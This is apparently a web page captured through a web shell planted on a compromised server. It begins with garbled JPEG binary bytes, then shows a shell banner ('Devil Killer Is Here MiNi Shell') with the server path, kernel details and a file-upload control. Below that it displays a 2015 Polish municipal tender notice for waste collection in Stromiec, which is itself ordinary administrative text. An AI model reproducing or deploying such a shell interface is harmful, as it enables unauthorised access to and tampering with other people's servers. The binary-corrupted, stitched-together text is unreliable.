JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/308960-N-2015.html

<p class="kh_header"><b>Stromiec: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Stromiec w latach 2016-2017.</b><br>
<b>Numer ogłoszenia: 308960 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stromiec, w imieniu której działa Wójt Gminy Stromiec , ul. Piaski 4, 26-804 Stromiec, woj. mazowieckie, tel. 48 619 10 20, faks 48 61 91 012.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.e-bip.ugstromiec</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Stromiec w latach 2016-2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia

1.	Przedmiotem zamówienia jest świadczenie usługi odbioru 
i zagospodarowania (poddanie odzyskowi lub unieszkodliwianiu zgodnie z obowiązującym prawem w tym wymaganiami ochrony środowiska) odpadów komunalnych powstających na nieruchomościach, na terenie gminy Stromiec, na których zamieszkują mieszkańcy (przekazanie do instalacji regionalnych wskazanych w WPGO).
    2. Transport odpadów zebranych z zamieszkałych nieruchomości, bądź w
          PSZOK :
a)	podlegających selektywnej zbiórce do instalacji odzysku 
i unieszkodliwiania odpadów,
    b) zmieszanych odpadów komunalnych, 
   3. Obszar gminy zajmuje powierzchnię 15 647 ha. Liczba mieszkańców 
       w Gminie (objęta usługą zbiórki odpadów) wynosi 5023.
W skład Gminy wchodzi 23 sołectwa.
Wykaz nieruchomości i liczbę mieszkańców w poszczególnych sołectwach określa załącznik Nr 10 do SIWZ.
Szczegółowy wykaz nieruchomości wraz z liczbą mieszkańców zamieszkujących dana nieruchomość oraz deklaracja selektywnej zbiórki będą przekazywane Wykonawcy w toku realizacji Zamówienia
      4. Zbiórka odpadów komunalnych z nieruchomości, na których zamieszkują
          mieszkańcy odbywać się będzie z podziałem na:
a)	odpady komunalne podlegające selektywnej zbiórce gromadzonych 
w pojemnikach lub workach o pojemności 120 l
 - papier, tektura, tekstylia
 - tworzywa sztuczne (plastik), odpady wielomateriałowe
 - szkło, metale
 - zmieszane odpady komunalne z wyłączeniem odpadów podlegających selektywnej zbiórce, odpadów komunalnych ulegających biodegradacji, przeterminowanych leków, chemikalia, zużytego sprzętu elektrycznego 
i elektronicznego, mebli, odpadów budowlanych, zużytych opon, baterii 
i akumulatorów
b) odpady komunalne niesegregowane
c) odpady komunalne wielkogabarytowe - tj. stare meble, wózki dziecięce,   deski , materace itp.,
d) zużyty sprzęt elektryczny i elektroniczny,
e) zużyte opony
f) odpady niebezpieczne (świetlówki, akumulatory, baterie itp.)
g) odpady budowlane i odpady z pielęgnacji ogrodów (przycięte gałęzie) nie są przedmiotem niniejszego zamówienia i ich odbiór odbywać się będzie 
w oparciu o indywidualne umowy cywilno-prawne zawierane pomiędzy właścicielem nieruchomości, a uprawnionym do odbioru odpadów przedsiębiorstwem.
Odpady wymienione w pkt a i b Wykonawca jest zobowiązany do odbioru 
z poszczególnych nieruchomości zgodnie z ustalonym harmonogramem odbioru 1 raz w miesiącu.
Odpady wymienione w pkt c,d,e,f  Wykonawca jest zobowiązany do odbioru dwa razy w roku (wiosna i jesień) w  terminie uzgodnionym 
z  Zamawiającym.
W okresie świadczenia usługi planuje się zebranie 435,0 Mg odpadów 
w ciągu 1 roku, w tym 175,0 Mg segregowanych rocznie, w tym:
- papier, tektura, tekstylia - 35,0 Mg,
- tworzywa sztuczne, odpady wielomateriałowe - 25,0 Mg,
- szkło - 50,0 Mg,
- metale - 5,0 Mg,
- odpady wielkogabarytowe - 30,0 Mg,
- zmieszane odpady opakowaniowe - 20 Mg, 
- zużyte urządzenia elektr. i elektron. - 10,0 Mg
 5. Wykonawca w ramach zamówienia zobowiązany jest do dostarczenia Zamawiającemu worków o pojemności 120 l z folii LDPF o grubości co najmniej 60 mikronów, przeznaczonych do gromadzenia odpadów segregowanych w czterech kolorach (kolory wg uznania Wykonawcy) lub oznaczone napisami: papier, szkło, plastyk, zmieszane.
     Przewidywana ilość worków potrzebnych do realizacji zamówienia 
     48.000 szt. rocznie.
     Pierwszą partię worków w ilości ok. 5800 szt. należy dostarczyć właścicielom nieruchomości w terminie do 05 stycznia 2016 r., na których zamieszkują mieszkańcy i przedłoży Zamawiającemu potwierdzenie ich dostarczenia opatrzone datą i podpisem właściciela. Pozostałą ilość worków należy pozostawiać właścicielom nieruchomości po każdorazowym odbiorze odpadów w ilości odpowiadającej odebranych worków.
     Na wniosek właściciela nieruchomości, Wykonawca zapewni pojemniki na odpady zmieszane. Forma i zasady udostępnienia pojemników regulować będzie umowa zawarta pomiędzy Wykonawcą, a właścicielem nieruchomości.    
     Po wybudowaniu Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK), przez Zamawiającego, Wykonawca wyposaży PSZOK w odpowiednie pojemniki do gromadzenia odpadów.
 6. System odbierania odpadów nie obejmuje odpadów powstających na nieruchomościach niezamieszkałych oraz w wyniku prowadzonej działalności gospodarczej.
 7. Wykonawca zobowiązany jest kontrolować realizowane przez właściciela posesji obowiązków w zakresie selektywnego zbierania odpadów komunalnych. Odpady źle wysegregowane, Wykonawca odbiera jako zmieszane odpady komunalne i niezwłocznie powiadamia o tym Zamawiającego. 
8. Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, worków i pojazdów w trakcie realizacji usługi 
9. Wykonawca jest zobowiązany do odbioru i transportu odpadów również 
     w przypadkach, kiedy dojazd do punktów zbiórki lub posesji indywidualnej będzie utrudniony z powodu remontów dróg itp.
10. Zgromadzane w workach i pojemnikach odpady, wystawione przed ogrodzeniem nieruchomości odbierane będą zgodnie ze sporządzonym przez Wykonawcę harmonogramem w dni robocze w godz. 7:00 - 18:00
11. Wykonawca odpowiada za szkody w majątku Zamawiającego oraz osób trzecich wyrządzone w trakcie realizacji usługi.
12. Wykonawca przekazuje zamawiającemu kopie dowodów dostarczenia odpadów do odzysku lub unieszkodliwiania (karty przekazania odpadów)
13. Wykonawca jest zobowiązany do prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy 
     o utrzymaniu czystości i porządku w gminach.
14. Wykonawca z godnie z art. 9n ustawy o utrzymaniu czystości i porządku
      w gminach, do końca miesiąca następującego po kwartale, przekazuje Zamawiającemu sprawozdania.
15. W trakcie realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do stosowania się do europejskich norm zarządzania środowiskiem, pod nadzorem osoby posiadającej kwalifikacje w zakresie prawidłowego stosowania tych norm, stosując określone procedury.
16. Wykonawca w trakcie realizacji umowy zobowiązany jest do przestrzegania przepisów prawa, a w szczególności:
- ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku 
  w gminach (Dz. U. z 2012 r. poz. 391 ze zm.) wraz z przepisami wykonawczymi,
- ustawy z dnia 14 grudnia 2012 r. o odpadach  (Dz.U. z 2013 r. poz. 21) wraz z przepisami wykonawczymi,
- ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz.U. 
   z 2013 r., poz. 1232 z późn. zm.) wraz z przepisami wykonawczymi,
- ustawy z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym 
   i elektronicznym (Dz. U. z 2013 r., poz. 1155 z późn. zm.),
- ustawy z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. 
   z 2015 r., poz. 687 z późn. zm.),
- Plan Gospodarki Odpadami dla Mazowsza na lata 2012 - 2017 
   z uwzględnieniem lat 2018 - 2023 przyjęty uchwałą nr 211/12 z dnia 22 października 2012 r.
- uchwała Rady Gminy Stromiec nr XIX.133.2012 z dn. 30 sierpnia 2012 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Stromiec oraz uchwały nr XXIII.154.2012 z dnia 28 grudnia 2012r.
        w sprawie zmian w Regulaminie utrzymania czystości i porządku na 
        terenie Gminy Stromiec.

   17. Zamawiający do 25 dnia każdego miesiąca będzie przekazywał 
        Wykonawcy zmiany w wykazie gospodarstw domowych zbierające odpady 
        segregowane i odpady zmieszane, które będą obowiązywały w miesiącu 
        następującym po miesiącu w którym przekazano informację Wykonawcy. 

Dodatkowe obowiązki Wykonawcy w zakresie używania pojazdów do realizacji 
przedmiotu zamówienia:
a)	zapewnienie przez cały czas trwania umowy dla właściwej realizacji przedmiotu umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, w ilości minimum jak w złożonej w postępowaniu przetargowym ofercie,
b)	użytkowanie pojazdów specjalistycznych dla tego typu usługi; pojazdy te powinny być we właściwym stanie technicznym i oznakowane w sposób czytelny i widoczny, umożliwiający łatwą identyfikację przedsiębiorcy poprzez umieszczenie na nich nazwy firmy, adresu i numeru telefonu przedsiębiorcy,
c)	odbieranie i transportowanie odpadów pojazdami bezpylnymi 
i konturowymi zgodnie z przepisami  art.61 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym  Dz.U z 2012 r Nr 198, poz1137).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.53.30.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji, zezwolenia lub licencji.
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:
a)	posiada wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Stromiec w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Stromiec,
b)	posiada zezwolenie na prowadzenie działalności w zakresie transportu 
i zbierania odpadów, wydane przez właściwy organ,
c)	posiada wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzonego przez Głównego Inspektora Ochrony Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie:
Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -            w tym okresie, wykonał lub wykonuje główne usługi polegające na odbieraniu odpadów komunalnych od właścicieli nieruchomości zamieszkałych, w tym:             2 usługi, z których każda była wykonana lub jest wykonywana w sposób ciągły przez okres co najmniej 12 miesięcy i które to usługi obejmowały odbiór odpadów komunalnych o łącznej masie co najmniej 200 Mg i obejmowała odbiór odpadów z obszaru zamieszkałego przez min 3.000 osób.
Uwaga:
1) Zamawiający stawiając powyższy warunek udziału w postępowaniu,
skorzystał z możliwości wynikającej z § 1 ust. 4 Rozporządzenia Prezesa
Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów,
jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te
dokumenty mogą być składane poprzez:
- określenie usług, których dotyczy obowiązek wskazania przez
Wykonawcę w wykazie tj. głównych usług rozumianych przez
Zamawiającego jako usługi polegające na odbieraniu odpadów
komunalnych od właścicieli nieruchomości;
- wskazanie usług, dla których Zamawiający wymaga załączenia
do oferty dowodów, potwierdzających, że usługi te zostały
wykonane lub są wykonywane należycie, tj. 2 usług, opisanych
w pkt. 2 SIWZ;
2) Zamawiający uzna, że powyższy warunek udziału w postępowaniu jest
spełniony a Wykonawca gwarantuje należyte wykonanie udzielanego
zamówienia, gdy wszystkie wykazane przez Wykonawcę usługi wykonał
lub wykonuje należycie; Dla każdej pozycji wykazu należy załączyć dokumenty, 
z których będzie wynikało, że usługi te zostały wykonane lub są wykonywane należycie, 
3) W przypadku usług nadal wykonywanych należy podać łączną masę
odpadów komunalnych odebranych przed upływem terminu składania ofert;
4) Pod pojęciem odpady komunalne należy rozumieć odpady powstające
w gospodarstwach domowych, z wyłączeniem pojazdów wycofanych
z eksploatacji, a także odpady niezawierające odpadów niebezpiecznych
pochodzące od innych wytwórców odpadów, które ze względu na swój
charakter lub skład są podobne do odpadów powstających
w gospodarstwach domowych; zmieszane odpady komunalne pozostają
zmieszanymi odpadami komunalnymi, nawet jeżeli zostały poddane
czynności przetwarzania odpadów, która nie zmieniła w sposób znaczący
ich właściwości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym.
Wykonawca winien wykazać, że dysponuje lub będzie dysponował niżej wymienionym sprzętem:
a) co najmniej 2 pojazdami przystosowanymi do odbioru odpadów komunalnych gromadzonych w pojemnikach i workach.
 b) co najmniej 1 pojazdem przystosowanym do odbioru odpadów komunalnych zbieranych selektywnie.
c) samochodem ciężarowym do transportu odpadów wielkogabarytowych 
o ładowności nie mniejszej niż 3,5 Mg,
d) pojazdy powinny spełniać standardy techniczne określone w przepisach szczególnych z uwzględnieniem zabezpieczenia przed wydostawaniem się odpadów oraz wydzielaniem zapachów,
e) Wykonawca zapewni zachowanie właściwego stanu sanitarnego 
i technicznego użytkowanych pojazdów (mycie, dezynfekcja sprzętu) 
w warunkach spełniających wymagania z zakresu ochrony środowiska 
i wymogów sanitarnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. dysponować takimi środkami finansowymi umożliwiającymi wykonanie zamówienia, przy założeniu, że płatność za realizację usługi następować będzie zgodnie z projektem umowy stanowiącym załącznik Nr 6.
Za spełnienie tego warunku uważane będzie zaakceptowanie projektu umowy (w treści oferty) stanowiącej załącznik do niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Każda ze stron umowy może się zwrócić do drugiej strony o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia zgodnie z zasadami opisanymi w art. 142 ust. 5 ustawy z dnia 29 sierpnia 2014r. o zmianie ustawy-Prawo zamówień publicznych (Dz.U. z 2014r. poz. 1232).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugstromiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stromiec
26-804 Stromiec ul. Piaski 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2015 godzina 10:00, miejsce: Urząd Gminy Stromiec
26-804 Stromiec
ul. Piaski 4 (Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
